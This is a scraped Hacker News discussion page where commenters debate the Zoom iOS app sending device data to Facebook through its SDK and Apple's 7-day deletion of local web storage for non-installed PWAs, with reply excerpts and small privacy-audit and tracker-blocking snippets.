bluesign(10000) 2 days ago [-]

Facebook is also an ad & analytics network. You can replace Facebook with any ad/analytics network and it will still be true.

Probably Vice's mobile app, or website, or any other app with ads, is sharing this information.

The problem is trying to create fake news like this by using popular names like Zoom and Facebook. (When I say fake news, I mean this is not news at all; what you can see in Google Analytics vs. this is not even comparable.)

otterley(3512) 2 days ago [-]

Please don't misuse the term 'fake news.' Fake news has a specific meaning: false stories that have no basis in fact but have tantalizing headlines meant to attract attention.

Attempting to change the meaning of the term dilutes its importance and introduces unnecessary confusion.

sneak(2447) 2 days ago [-]

Reminder: The NextDNS iOS app allows you to monitor and block these types of requests from all of your apps, via their DNS logging/filtering. (You can also configure the retention on the DNS logging, so as to not cause more toxic waste data.)

I can't recommend it enough. Until/unless we get something like Little Snitch for the phone (are you listening, Apple?!), this is the next best thing.

proactivesvcs(10000) 1 day ago [-]

Blokada has a similar feature set, with support for bundled advert/spyware/social media block lists as well as your own.

wackget(10000) 1 day ago [-]

On the NextDNS website:

> 'Try it now for free. No sign up required.'

> I click the button

> 'Sign In. Don't have an account? Sign up.'

zentiggr(10000) 1 day ago [-]

How does its blocking compare to Blokada's?

claudeganon(3646) 2 days ago [-]

Are there any guides for running your own setup with similar filtering functionality? Not keen to run all my traffic through some unknown VPN.

om42(10000) 1 day ago [-]

NextDNS is great; set it up on all my devices a while back when there was a post on here about it. Uninstalled a few apps just from seeing the number of requests they were sending even when I didn't use those apps frequently.

Like it's mentioned in this discussion, using the FB SDK will result in apps sending requests to FB. Found a banking app I use was doing this...

totaldude87(3428) 1 day ago [-]

THIS! Thank you! Just installed it and found tons of queries to Uber (never used Uber in the past many months); uninstalled it finally!

bosswipe(10000) 1 day ago [-]

In my experience developers that integrate the FB SDK into their apps just copy-paste whatever code snippet Facebook tells them to do, which is always maximum data capture, without thinking of any of the implications. There's usually a way to limit data leakage while using the minimum FB functionality you want, such as only using FB for login without sending every damn app event to Facebook.
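
On iOS, for example, Facebook documents Info.plist keys for turning off the SDK's automatic event logging; the key names below are taken from those docs but should be verified against the current documentation. A minimal sketch that audits a build's Info.plist for them:

    import plistlib
    import sys

    # Keys Facebook documents for disabling automatic SDK logging on iOS;
    # verify against the current docs before relying on them.
    OPT_OUT_KEYS = [
        "FacebookAutoLogAppEventsEnabled",
        "FacebookAdvertiserIDCollectionEnabled",
    ]

    def audit(plist_path):
        with open(plist_path, "rb") as f:
            info = plistlib.load(f)
        for key in OPT_OUT_KEYS:
            value = info.get(key, True)  # the SDK treats missing keys as enabled
            print("%s: %s" % (key, "disabled" if value is False else "ENABLED"))

    if __name__ == "__main__":
        audit(sys.argv[1])  # e.g. python audit_plist.py Payload/App.app/Info.plist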

rochak(4063) about 20 hours ago [-]

How is this not reviewed by other developers who might not be as negligent as the one who just copied the code?

throw03172019(4341) 1 day ago [-]

Is this for advertising reasons (I.e. closing the loop)?

badwolf(10000) 1 day ago [-]

Facebook login.

Edit: Also attribution.

mikorym(4263) 1 day ago [-]

It's interesting how all the infosec experts are zooming in on Zoom and providing details that otherwise may have gone unnoticed for a long time.

saagarjha(10000) 1 day ago [-]

Because a lot of people are using Zoom regularly?

godelski(4310) 2 days ago [-]

> There is nothing in the privacy policy that addresses [that data is being sent to Facebook]

> The Zoom app notifies Facebook when the user opens the app, details on the user's device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user's device which companies can use to target a user with advertisements

So Zoom is sending the fingerprints of mobile users to Facebook. Which helps Facebook better track users across the internet. Not only this, but Zoom is not disclosing this information (though it isn't like people read TOS and would be aware of this anyways).

Can we just stop sending data everywhere? If you don't need it, don't gather it.

tw04(10000) 1 day ago [-]

Can we stop sharing data with facebook and google or literally ANY third party unless absolutely necessary? And if it is absolutely necessary, let users opt out and tell them what feature they lose?????

Zoom is quickly gaining a reputation for doing the wrong thing anytime they have a choice between right and wrong.

somethoughts(10000) 1 day ago [-]

Similar to how we have organizations which can certify whether produce is organic or not, we need organizations which can certify whether apps and websites are ad-tracking-free.

SlowRobotAhead(10000) 1 day ago [-]

You think Zoom is doing it for fun? This is a revenue source right?

orasis(4317) about 23 hours ago [-]

Mobile app developers need to gather install/purchase data so they can optimize user acquisition spend. Most are not using PII so I don't see any problem.

KennethSRoberts(10000) 1 day ago [-]

pi-hole
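
pi-hole works by answering DNS lookups for known tracker domains with a dead address, so the beacons never leave your network. A minimal sketch of the same idea as a hosts-file generator; the domain list is illustrative, not a real blocklist:

    # Emit /etc/hosts entries that blackhole known tracker domains.
    TRACKERS = [
        "graph.facebook.com",
        "connect.facebook.net",
        "www.google-analytics.com",
    ]

    def hosts_lines(domains, sink="0.0.0.0"):
        # Point each domain at an unroutable sink address.
        return ["%s %s" % (sink, d) for d in sorted(set(domains))]

    print("\n".join(hosts_lines(TRACKERS)))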

mikorym(4263) 1 day ago [-]

My opinion about this is that many apps and websites don't have a real product offering. FB, Dropbox, Twitter and others are more of a service offering than a product offering, and hence everything revolves around services, tracking services and, finally, just plain old tracking.

adam_fallon_(10000) 1 day ago [-]

One thing I'll note here as a potential reason why they do this:

I just recently attempted to set up Facebook adverts for an app I developed. When it came time for me to set the metric up I obviously chose 'App Installs' as my metric to track.

To do this, Facebook told me I needed to install the Facebook SDK in my app to attribute an advert's conversion.

I didn't end up running the ad, but I can see why companies potentially have the SDK embedded in their apps to track ad-spend, hence the phoning-home to Facebook.

Edit: Just so people don't have to dig to verify;

https://en-gb.facebook.com/business/help/2083260191704068?id...

robin_reala(30) 2 days ago [-]

The good thing is that this is illegal in the EU, so they can just be sued for problematic amounts of money.

m463(10000) 1 day ago [-]

The Kindle app contacts Facebook too. All KINDS of webpages and apps contact Facebook. It's a mess that I figure only legislation can help correct.

leggomylibro(10000) 2 days ago [-]

It's past time for us to get serious and apply HIPAA-style protection to the storage and transmission of PII, without exemptions.

Companies like Facebook will complain loudly that they won't be able to survive, but that is not our problem. If we pass legislation with teeth, they will need to change their business model. That would be the point.

6nf(10000) 1 day ago [-]

> If you don't need it, don't gather it.

What if they need it... to make more money?

andrepd(3744) 1 day ago [-]

>Can we just stop sending data everywhere? If you don't need it, don't gather it.

We're not gonna get there by asking nicely. We need legislation with teeth (read: fines worth 6 months' or 1 year's global turnover).

catacombs(2414) about 24 hours ago [-]

> Can we just stop sending data everywhere? If you don't need it, don't gather it.

But...but... consumer data is a gold mine! We have to sell it! Who will think of the shareholders?

HenryBemis(4292) 1 day ago [-]

I have been using Android for the last few years (with NoRoot Firewall installed) and before that I was using iPhone (jailbroken with FirewallIP installed).

95% of the applications installed (on both Android & iPhone) 'talk' to/send a ping to Facebook when they open. That includes all the airline apps, Spotify, anything you can imagine. The only 'clean' apps I have found are Amazon, eBay, Dropbox, Signal, Telegram, Skype.

Anyone using Android, do yourselves the favor and install (free) NoRoot Firewall. Once you 'Start' the firewall, check the tabs 'Logs' and 'Pending' and you will be surprised at what your apps are doing, especially if you leave them running in the background. I also use it to block trackers, ads, FB, etc.

fmjrey(10000) 2 days ago [-]

On Android, the first thing you notice when you install a firewall such as NetGuard is the number of applications that try to access Facebook servers. It's mind-boggling; probably 50% are doing so. And I'm not even on Facebook at all.

panpanna(10000) 1 day ago [-]

NetGuard is fantastic, but is there a way to automatically disable tracking sites without selecting them manually for every app?

It could, for example, use the uBlock lists for automated blocking of all known trackers.

cpv(10000) 1 day ago [-]

Apps like NetGuard open your eyes.

And it was sad to see in Facebook's Off-Facebook Activity how much data was linked to me from apps which have the SDK. And you don't even need to log in via Facebook or like/share; the SDK being present and working is enough.

yalogin(4007) 1 day ago [-]

Why do people use Zoom at all? I know big companies that use it. It's a little disconcerting that even large companies don't ask the right questions or do the due diligence when paying for it.

jdm2212(10000) 1 day ago [-]

It actually works, which sadly makes it way above average.

I've had to switch off between WebEx, Zoom and Hangouts for the last month and Zoom is head and shoulders above the other two in terms of usability and call quality. And there's whatever Cisco's previous craptastic offering was (jabber?) which is far, far worse than any of those three.

callalex(10000) 1 day ago [-]

Big wigs tend to make software purchasing decisions based on marketing, features, price, and nothing else. In that order.

exotree(3126) 1 day ago [-]

Here's a reality for folks: right now, Zoom is literally saving entire corporations and jobs in the midst of a global pandemic. Outside this little bubble, no one is blinking twice at this, and neither is our government, frankly; and that's how it should be. The benefit of Zoom actually _even working at all_ during this time is to be applauded, and the engineers and customer service reps should be applauded. This... this right here is a privileged group of people with no conception of what real problems actually look like.

dylan604(3585) 1 day ago [-]

>Zoom is literally saving entire corporations

So, this is the one SV disruptor that is actually changing the world? I hope you didn't break your arm reaching around to pat yourself on the back with that one.

>Outside this little bubble, no one is blinking twice at this,

Might I suggest stepping out of your bubble to realize that the world is not going to end because of the lack of a video conference. People are sheep. Fire is hot and water is wet. 'People are not blinking twice' is not the hill you want to die on. You might as well say 'people are stupid, and we can take advantage of them'. At least that would be honest.

Build an app. If it is good and people want it, they will pay for it. If you want to make it free by selling the data you harvest from the users, then be up front about it and let the users decide. As you stated, people are not 'blinking twice'. Since you are not up front about it, then any good will you might have earned is out the window.

wideasleep1(10000) 1 day ago [-]

Welcome, Zoom employee. The 'privileged' condescension tack will not win friends and influence people. Have you tried meet.jit.si? It's secure and free, no account or download needed. Cheers.

amelius(831) 1 day ago [-]

What does the GDPR say about this?

Anyway, let's just ban targeted advertising already to stop this madness at its root.

Nextgrid(3983) 1 day ago [-]

GDPR says it's illegal, but its weight is about the same as the UK law that says it's illegal to handle salmon in suspicious circumstances (https://en.wikipedia.org/wiki/Salmon_Act_1986).

A law is only good if there are actual consequences for breaking it and so far there hasn't been any for these kinds of large-scale breaches.

kevin_thibedeau(10000) 2 days ago [-]

The HTC/Nokia phones do this when you open the camera app. Blockable with NoRoot Firewall.

zachware(10000) 2 days ago [-]

I believe NextDNS also blocks this.

_jal(10000) 1 day ago [-]

I want to see the App Store list what entities a given app might communicate with without explicit user request.

If your SDK feeds FB, it needs to be on the label. If you talk to dodgy surveillance shops, ditto. Making this enforceable (plist authorizations, like microphone permissions) is a little tricky, but at the very least smoking out slimy crap like this would be much easier.

wideasleep1(10000) 1 day ago [-]

Never gonna happen. You want the house of cards to come tumbling down?

node-bayarea(2812) 1 day ago [-]

I see that as Zoom's stock price is increasing, people are writing hit pieces against it! Good job!

netsharc(10000) 1 day ago [-]

Such 'hail corporate'... How about you look at it another way: the stock price is increasing because the app just got super popular the last few days, but users might not be aware of the privacy implications of the app, and curious experts started digging into it to see if it's a safe app.

It'd be like saying the people who were investigating Dieselgate were doing it because they wanted to destroy VW's stock price, instead of caring about the health of humans.

ogre_codes(10000) 2 days ago [-]

Every time I read an article with FaceBook in the title I'm a little more glad that I stopped using the service a while ago. Stuck using Zoom for work, but I do use it on a semi-quarantined device so it shouldn't be able to tie it back to my old Facebook account or online activity on my desktop.

conqrr(4259) 2 days ago [-]

Technically it can still link you to the old account through metadata that zoom has on you like your name, workplace etc

Nextgrid(3983) 1 day ago [-]

The problem isn't using Facebook. In fact, if you were knowingly using Facebook it might be considered a fair trade-off that you get stalked in exchange for getting the service for free (not saying it is right, but at least you have all the facts and can decide whether using Facebook is worth it).

The problem is that Facebook stalks you regardless of whether you have an account or not (through their SDKs embedded in pretty much every app).

julianozen(3836) 2 days ago [-]

To clarify, having just worked with the Facebook SDK library for my company's codebase, I don't think it is possible to set up the SDK without this happening. Disclaimer: I do not know what the Facebook SDK does after you call its launch methods, but I am pretty certain that they are required for at least some versions of the SDK.

If you are a Zoom user who is not using a Facebook account, I believe the only info Facebook is getting is that the Zoom app was launched and nothing about the user itself. Unfortunately the side-effect of using the FBSDK is that Facebook can track your app's usage for all users.

I believe this is true of all apps with a 'Log in with Facebook' button. FWIW, it does not appear that other OAuth providers do this (including Google).

xmprt(10000) 1 day ago [-]

Can't they fingerprint the device? The fact that Zoom was launched on a specific device is still a lot more information than I would be comfortable giving up if I don't use Facebook at all.

itronitron(4187) 1 day ago [-]

I imagine in an alternative universe that Snowden's book is about his time at Facebook.

ratww(10000) 1 day ago [-]

FWIW, it's possible to use OAuth login without importing the SDK.

I did it on my last company's apps and webapps when we had to optimise for performance, and removed some dependencies.

Of course, now that I'm gone the SDK is back because one of the developers was bullish on using the SDKs at all costs (the webapp, for example, now loads FB, Google and Linkedin SDKs on launch).

This is a problem that we developers are creating.

sandov(10000) 1 day ago [-]

What's the point of having a closed ecosystem if you allow spyware in your store anyway?

theNarrative24(10000) 1 day ago [-]

You can ban competitor apps and charge big fees.

For the customer? The false feeling of security and privacy. Marketing!

rvz(3575) 2 days ago [-]

Well, everything that imports the Facebook SDK or allows sign-in with Facebook does this, so as long as an app has that blue button on the screen, you shouldn't be surprised that it will phone home to Facebook once the app is opened and initialised.

Too bad it isn't practical to have a system-wide blacklist of selected hosts on iOS. Maybe you can, but it requires a jailbreak, and that too can break some apps.

newscracker(3530) 2 days ago [-]

There are some "VPN" apps that can stop connections system-wide. I'm not sure about custom block lists, but take a look at the free Lockdown app (it's FOSS). It does all processing on-device. There's also a paid app (which for me is an expensive subscription) called Guardian Firewall, which uses its servers to process requests.

Daniel_sk(4344) 2 days ago [-]

A lot of apps are doing it without the developers even knowing about it (ask me how I know). You just integrate their SDK for social login or something else and it will start sending data to the mothership.

ryandrake(4255) 1 day ago [-]

This is one of the reasons why you are supposed to audit your dependencies and understand what they do. There is no excuse for an app developer to ship their app and not know what it does.

gentleman11(10000) 1 day ago [-]

So what options do we have for private video conferencing?

samueloph(10000) 1 day ago [-]

jitsi

1over137(10000) 1 day ago [-]

jitsi-meet, see:

https://meet.jit.si/ https://github.com/jitsi/jitsi-meet

You can self-host it, or use the first link. No need to give your email, name, or phone number.

gentleman11(10000) 1 day ago [-]

Is whereby any good for privacy? I found this in the privacy policy. I like the app for usability

> We will never collect or record the content in conversations.

clement_b(10000) 2 days ago [-]

Ahem. That's just Facebook Analytics. Yes, it should be mentioned in the privacy policy, especially if they operate in countries under the GDPR (they do).

But having a go at Zoom on this ground is unfair, given many developers do the exact same thing.

cuspycode(10000) 1 day ago [-]

So maybe it's unfair, but unfair is perfectly OK in this kind of situation. The important thing is to call it out and make it stop, even if this has to be done for one perpetrator at a time.

jacobwilliamroy(4255) 2 days ago [-]

Let's have a go at those other developers too, then.

ncr100(10000) 1 day ago [-]

Because Facebook could figure out WHO YOU ARE TALKING WITH. If you're talking with someone 'sensitive', Facebook will know.

Perhaps FB needs to use heuristics to join Caller A with Caller B based upon timestamps, etc.

But ZOOM is a messaging app and the IMPLICATION is that FB will know some EXTRA DETAIL about my private life: the other people in it.

It's not like this is CANDY CRUSH - duh that's just some game. This is ZOOM, a face-to-face communications app. Much more serious.

Apple should flag this for its users on the App Store.

yjftsjthsd-h(10000) 2 days ago [-]

How does that make it better? Does FB not commingle the data? And no, others doing the same doesn't make this better, it makes them all bad.

ilikehurdles(10000) 1 day ago [-]

Analytics that fingerprints a device, fingerprints that Facebook can then use to build shadow profiles of people not consenting to have their data processed and stored by Facebook.

untog(2451) 1 day ago [-]

People crap on the web for its privacy record - justifiably - but at least you can open dev tools and see what the page is doing. Selling apps as being better for privacy just seems like a complete misstatement.

Polylactic_acid(10000) 1 day ago [-]

And you can install extensions that do that for you and actually block the requests. I'm not aware of any tool to block the facebook sdk in apps.

samstave(3899) 1 day ago [-]

So facebook sent me a cease and desist threat for revealing that they were tracking all vehicles driving by their campus and then telling the city of menlo park of this.

So facebook, i want you to cease and desist in tracking anything and everything about me or anyone who wants nothing to do with your leviathan of bullshit tracking or pay out the ass and prove all my data has been deleted, and provide me a manner with which i can audit you for having no data on me.

If not, lets reveal all the other things you track on people who want nothing to do with you.

dylan604(3585) 1 day ago [-]

>So facebook sent me a cease and desist threat for revealing that they were tracking all vehicles driving by their campus and then telling the city of menlo park of this.

Do you have a blog or some such going into more details? This raises all sorts of curiousness. How did you find out this is what was going on? What justifications did FB claim for doing the tracking? What justifications did FB claim for stopping you from talking about it? As the Robot says 'Data inadequate!'

klathzazt(10000) 1 day ago [-]

Criminalize targeted advertising

dylan604(3585) 1 day ago [-]

And what agency will police that policy?





Historical Discussions: Private client-side-only PWAs are hard, but now Apple made them impossible (March 25, 2020: 952 points)

(955) Private client-side-only PWAs are hard, but now Apple made them impossible

955 points 3 days ago by soapdog in 4079th position

andregarzia.com | Estimated reading time – 14 minutes | comments | anchor

PWAs are awesome. If your own personal subjective opinion of them is that they are shit, you're free to not use them. It is not OK for you, or Apple, to cripple mine though. Oh, and this affects the whole web, not just PWAs, so you should read on.

2 days ago

Freedom in software is only possible if the operating system also protects the user's freedom. Another unfortunate decision by Apple:

2 days ago

The first two items are web developers' fault, the second is the browser vendors' fault, the third is solvable with the Web Share API. All the things you're complaining about there are not reasons not to have PWAs; they are reasons to improve them.

2 days ago

Is this the death of the PWA? Maybe ... I doubt it though ... andregarzia.com/2020/03/privat...

2 days ago

iOS and iPadOS 13.4 and Safari 13.1 on macOS: '...deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site'. Affected: IndexedDB, LocalStorage, Media keys, SessionStorage, Service Worker registrations.

2 days ago

Those are just sites, but without the browser's toolbar. Can Kindle read from your local library? Can Kindle save books to your local lib? Can Spotify buffer 1 hour to your local drive? Can Spotify play from your drive?

2 days ago

As an example, years ago I created a comic reader as a pure client-side app. It could read comics from your hard drive, it would save them to indexeddb. You could add online drives to it and then it would fetch them all and save, or you could drag and drop a bunch of cbrs.

2 days ago

Am I right in my reading that, if your app has been added to the home screen, it's not subject to the 7-day timer?

2 days ago

It appears so, but in the same paragraph it says that it keeps a separate day counter for installed apps, so I don't know why they keep that counter if they are not erasing it. I'm not sure at all. This affects all non-installed web apps, though.

2 days ago

It's confusingly worded, but I took it to mean 'if your website is not used within 7 days of Safari use, the data is deleted; but if it's installed, then it's if your website is not used within 7 days of your website's use, which is unlikely'. But yeah, sucks for non-installed sites.

2 days ago

You should update your post; it has since been clarified that this update does not impact web apps installed to the home screen. Let's avoid spreading rumors that PWAs are crippled, as we've learned that is not the case.

2 days ago

Def confusing, but you nailed it: installed web app + browser are pegged to each other as a separate instance from Safari, so any day of use = website use for home screen apps. Counter always stays at zero. 🥳

2 days ago

That will make it really hard to make PWAs that are real apps andregarzia.com/2020/03/privat...

Yesterday

Be aware that PWAs are still PWAs regardless of whether they are installed or not. Installing is an optional step if you want it on the home screen; you might maintain it as a bookmark in the browser, in which case they are crippled. It is not a rumor, it is in the WebKit blog post.

Yesterday

That's fair, but this is an important distinction. While not ideal, I don't think most users have expectations around offline capabilities for past-visited / bookmarked sites. Much of the uproar about this update was around crippling installed Web apps, and this has not happened.

Yesterday

An example, I've built a comics reader. It loads comics into indexedb from an online drive, or from your dragging and dropping the files into it. Once added, the user has expectations that the data will be there. There is no server, the data is local-only. (thread)

Yesterday

If they spent seven days without opening the app, that data would be gone. There are shopping list pwas where people keep adding stuff to buy eventually with bookmarklets. That data will be gone.

Yesterday

Agree this sucks! But not the *most* unreasonable approach by Apple. I'm happy that this still possible if app is installed, and is solvable by communicating to users that they need to install the app for data to persist past 7 (min) days. Assume installation is the goal anyway.

Yesterday

This is true, and I would like to see this solved. Long-term, I am optimistic that Safari will get with the times, short term I feel better because of Chrome's market share on macOS.

Yesterday

but installation is not the goal. The user should not be forced to install anything. The most important letter in PWA is W. Installation to the homescreen is just a convenience. The service worker, all the other APIs, they are working regardless if the app is on the homescreen.

Yesterday

Agree, my biggest gripe of all at the moment 😤. But unrelated to today's announcement. To be clear, I agree with you on most points. I do think that Apple is hostile to Web in order to prop up the app store. I hate it.

Yesterday

Shortcuts-based workaround

One workaround for this is to make a Shortcut that has page data embedded in it as base64, and opens it in Safari. To fix the LocalStorage issue, you can add a button labeled 'Sync data to Phone' or something similar that will sync the data to a Dropbox or iCloud Drive file, again, using Shortcuts. This post is a reply to 'Private client-side-only PWAs are hard, but now Apple made them impossible'
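
As a sketch of the embedding step that workaround relies on: a data: URI can carry an entire self-contained page, so the 'app' lives in the bookmark or Shortcut itself rather than in script-writable storage. A minimal example, with an illustrative file name:

    import base64
    import pathlib

    def html_to_data_uri(path):
        # Pack a self-contained HTML page into a base64 data: URI.
        raw = pathlib.Path(path).read_bytes()
        return "data:text/html;base64," + base64.b64encode(raw).decode("ascii")

    print(html_to_data_uri("app.html"))  # illustrative file name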

Yesterday

Ok, you make a good philosophical point. I guess I just worry that with too much doom and gloom, devs will be turned off of PWAs. Apple will only become Web friendly if forced through antitrust, or if there is a booming ecosystem of PWAs. I mainly hold out hope for the latter.

Yesterday

In the name of privacy, PWA & all legitimate use cases for browser storage (👋 UX) just got the middle finger. Ads will be less relevant to you... yay? 🤷‍♂️ Saddle up for LOTS of downloadable electron apps. RIP batteries andregarzia.com/2020/03/privat...

Yesterday

With the ITP update, third-party cookies are now completely blocked; in addition, for LocalStorage too, from a privacy-protection standpoint, data will now be deleted if you don't access the site for one week. andregarzia.com/2020/03/privat...

Yesterday

This is inconceivable. Apple is going to clear localStorage of web apps that have been idle for 7 days. They are breaking everything. andregarzia.com/2020/03/privat...

Yesterday

Progressive Web Apps on the open web are an attack on Apple's App Store. Apple is fighting back - andregarzia.com/2020/03/privat...

Yesterday

The state of #PWA|s on smartphones makes me sad. So many conceptual problems listed in this thread. Most frustrating: users downvoting web apps in the Play Store, b/c they think it's „not a real app". #webdev andregarzia.com/2020/03/privat...

Yesterday

Clearly, Apple sees PWAs as a threat to their app store revenue, and they're trying to disguise is as improving privacy for users. andregarzia.com/2020/03/privat...

Yesterday

No more PWA. So, we are stuck with 'Responsive Websites' + Mobile Apps. andregarzia.com/2020/03/privat...

Yesterday

@Alfayo_Kat after publishing your first app on the apple store , here are some bad and good news andregarzia.com/2020/03/privat...

Yesterday

'Private client-side-only PWAs are hard, but now Apple made them impossible' andregarzia.com/2020/03/privat... Of course, critical apps should never rely on 3rd-party servers or even the App Store. The SecureBookmark technique via data: URI is much more powerful: coins.github.io/secure-bookmar...

Yesterday

Not great for those of us with PWAs... especially if you care about Apple users. andregarzia.com/2020/03/privat...

5 hours ago

If you want to read about full third-party cookie blocking in Safari and what that means for PWAs potentially: webkit.org/blog/10218/ful... andregarzia.com/2020/03/privat...




All Comments: [-] | anchor

dubcanada(4144) 3 days ago [-]

I don't understand what the problem is.

I can easily go to the settings area and delete my entire browser cache (Remove All Website Data); in fact, if you are running low on space it even tells you to do it.

Why are people assuming a browser is a good place to store things? Nothing stored in a browser should be assumed to be forever.

beering(10000) 3 days ago [-]

If you read the article, that's the issue the author was talking about: it's basically impossible to make an app that can store its data locally, instead of on some web server.

All apps that you download from App Store can live offline, where they're usable without Internet or trusting some faraway web server.

You can't make a web app that can do that, and to some people it smells like Apple trying to force developers to release through the App Store.

riquito(4308) 3 days ago [-]

If you are distributing a PWA through e.g. Electron, the user does not (easily) have the means to delete the cache. Web app is a misnomer in that case; they are just applications running inside a somewhat hidden browser.

notduncansmith(4049) 3 days ago [-]

I also don't understand the alarm.

There is no hard limit on how long things will be stored. Data in localStorage might still be stored for weeks/months/years, as before.

The only limit is on how long things will be stored if the user does not interact with the site/PWA.

If you are a website, not a natively-installed app, that I haven't 'used' in a first-party sense for 7 days or more, I don't think your data belongs on my device.

Storage space can be limited, and any app I haven't used in 7 days should be happy to re-fetch my data from a server or convince me to install their native app.

To act like this is some nefarious plan by Apple to get people to build native apps instead of PWAs is absurd. If a PWA was written properly in the first place, this change will have basically 0 impact on it.

onion2k(2103) 3 days ago [-]

There's a big difference between a user choosing to clear their data and a browser vendor deciding to clear a user's data.

arendtio(10000) 3 days ago [-]

The problem is that it rarely happens under normal circumstances. So you might build logic which synchronizes your data to the server but rarely has to download it, as most of the time the client still has a relatively current snapshot. And the few times you have to download everything, it is OK for the user to wait a while.

But if you have to wait every time your last interaction is more than 7 days ago, the whole experience will change. And supporting a reliable offline experience will be very hard to build.

ravenstine(10000) 3 days ago [-]

That's like asking why people store files on disks when they could store everything in the cloud.

daleharvey(1016) 3 days ago [-]

I can delete data from my hard drive, so why are people assuming a computer is a good place to store things? Nothing stored on a computer should be assumed to last forever.

themihai(4031) 3 days ago [-]

Offline web apps were already weak (e.g. CORS restrictions). Now they are even more useless with this storage limitation. You can't really blame Apple... after all, Google claimed that offline web apps are nothing more than websites, so that's what we have. I don't mind if Safari deletes offline data stored by websites every week, so why would I complain about 'offline apps'?

My point is that offline web apps (i.e. PWAs) that are installed on the user's desktop should have a few more permissions than websites, but the people in charge (Google, Apple, etc.) seem to think otherwise.

https://discourse.wicg.io/t/proposal-full-network-access-in-...

pier25(2695) 3 days ago [-]

Read the article, it's not only about offline PWAs. All local storage is deleted after 7 days.

eyesee(10000) 3 days ago [-]

Would it be possible for Apple to relax the 7-day limit for apps that are strictly client-side only? I.e., sandbox the apps so they cannot access any remote resources? It seems to me the opportunity to exploit a user's privacy would be very limited without exfiltration.

icebraining(3767) 3 days ago [-]

Maybe, but it would only apply to a subset of PWAs. For example, the OP's RSS reader must access remote resources.

rconti(10000) 3 days ago [-]

> What are private client-side PWAs anyway?

(proceeds to not answer the question)

Found the answer: Progressive Web Apps[1]

1: https://medium.com/@amberleyjohanna/seriously-though-what-is...

soapdog(4079) 3 days ago [-]

Sorry, I wrote this blog post too fast because I was/am a bit angry, and didn't notice my use of jargon without explanation.

It stands for 'Progressive Web App'. Basically it is a marketing term used to place some new web APIs and best practices under the umbrella of 'near-native UX in a web app'. What it usually means is that your application is:

* Served from a secure context (a requirement for the other APIs anyway).

* Has an application manifest (this contains metadata about your web app and is used by browsers and OSs to add icons, names, themes, etc)

* Has a service worker (which enables your application to potentially work offline beyond what other cache solutions did in the past)

So with these in place, browsers can offer an 'install this site as an app' feature which allows the site to open in its own window, with its own icon and name in launchers and home screens.
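For readers who want to see the moving parts, here is a minimal sketch of the pieces soapdog lists, in plain JavaScript; the file names and cached paths are hypothetical. The manifest itself is just a JSON file of metadata (name, icons, display mode) referenced from the page's head.

    // In the page: register the service worker (path is a placeholder).
    if ('serviceWorker' in navigator) {
      navigator.serviceWorker.register('/sw.js');
    }

    // In sw.js: pre-cache an app shell and serve it cache-first,
    // which is what lets the app open with no network at all.
    const CACHE = 'app-shell-v1';
    self.addEventListener('install', (event) => {
      event.waitUntil(
        caches.open(CACHE).then((cache) => cache.addAll(['/', '/app.js', '/app.css']))
      );
    });
    self.addEventListener('fetch', (event) => {
      event.respondWith(
        caches.match(event.request).then((hit) => hit || fetch(event.request))
      );
    });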

MaxBarraclough(10000) 3 days ago [-]

As the article explains, Offline Web App is being used to mean Progressive Web Application (the standard terminology).

(edit Turns out that's not quite right, see diggan's reply.)

From the article:

> You'd almost think they had an App Store to promote or something.

There's certainly a tension here. I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

Perhaps related: Very roughly a year ago, something changed in iOS that broke the 2048 PWA. Its swipe-detection no longer works. A pity.

diggan(872) 3 days ago [-]

Offline web apps are different from PWAs. A PWA doesn't necessarily work offline; rather, it is independent of the connection and of how it's loaded. I do think most PWAs work offline, but that doesn't mean it's a requirement for calling something a PWA.

Similarly, an offline-capable web app is not necessarily a PWA, as a PWA carries a lot of features besides being offline-capable.

criddell(4281) 3 days ago [-]

> I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

Because users won't use them. For users that don't have a technical background: if it isn't in the app store, then it essentially isn't an app. For techie users: lots of us don't want web apps because the power, memory, and bandwidth usage is often higher than a well-written native app's. The fact that there's a gatekeeper who has some control over what shows up in the app store is usually a feature and not a bug.

If there were big parts of the app ecosystem that didn't have native apps, then eventually users would find web apps. But that isn't the case. Think of anything and search for it in the app store and there's an app for it (including 2048).

vbezhenar(3839) 3 days ago [-]

> I'm still not sure why more vendors don't make iOS PWAs to get around the App Store payment rules.

One reason is that Apple has an incentive to break PWAs, and they will do it. It's not a wise business decision to act against a big player.

arghwhat(10000) 3 days ago [-]

Better title: Apple restricts tracking by limiting browser storage, which hurts my particular app.

Browsers need to be severely limited due to them running arbitrary code from the web. Doesn't matter if it's an offline web app. If you want more access, make a native app (with or without web technologies).

megous(4302) 3 days ago [-]

> If you want more access, make a native app (with or without web technologies).

How is installing a native app better for a random user, privacy- or security-wise, exactly?

Wowfunhappy(3954) 3 days ago [-]

And, um, any other app which saves its data locally.

m-p-3(10000) 3 days ago [-]

> If you want more access

which is somewhat ironic, because the goal of a web app is to break free of the walled garden and become OS-independent.

the_gipsy(10000) 3 days ago [-]

> If you want more access, make a native app

...and give Apple their cut. Why not add permissions to web apps? Like location, or push notifications... oh, that's another feature that happens to be missing only in Safari.

Just accepting these moves from Apple as 'in the interest of users' is naïve. Apple has a huge vested interest in their App Store, and every web app is a potential App Store app, i.e. lost revenue.

I mean, maybe Apple is right, and the web should go back to a read-only, document-like format, like in the old days. Articles and links. Apps for everything else. But let's not kid ourselves that they do it purely in the user's interest.

fierarul(4261) 3 days ago [-]

But browsers are severely sandboxed already. What the article is talking about is:

> deleting all local storage (including Indexed DB, etc.) after 7 days

I can see how that might help privacy (since you could be tracked via local storage too), but also how it might break any web app that needs data to last more than 7 days.

> If you want more access, make a native app

But then everybody will complain about yet another Electron app, right? Not to mention that you have to fork over $99 and go through the signing/notarization hoops that change from one week to the next.

I think in the name of privacy and security only Apple and a select few corporations will be allowed to make software in the future. macOS/iOS and Windows 10 are evolutionary dead ends in many ways.

pier25(2695) 3 days ago [-]

> which hurts my particular app

A big chunk of the web these days uses JWTs in localStorage for auth.
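As a concrete illustration of the pattern pier25 means (the key name is hypothetical):

    // Keep the JWT returned at login in localStorage between visits.
    function saveToken(jwt) {
      localStorage.setItem('auth_token', jwt);
    }

    // Attach it to API calls; if ITP has wiped localStorage after 7 days
    // of no interaction, this returns null and the user must log in again.
    function authHeader() {
      const jwt = localStorage.getItem('auth_token');
      return jwt ? { Authorization: 'Bearer ' + jwt } : {};
    }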

codesections(1765) 3 days ago [-]

> Apple restricts tracking by limiting browser storage

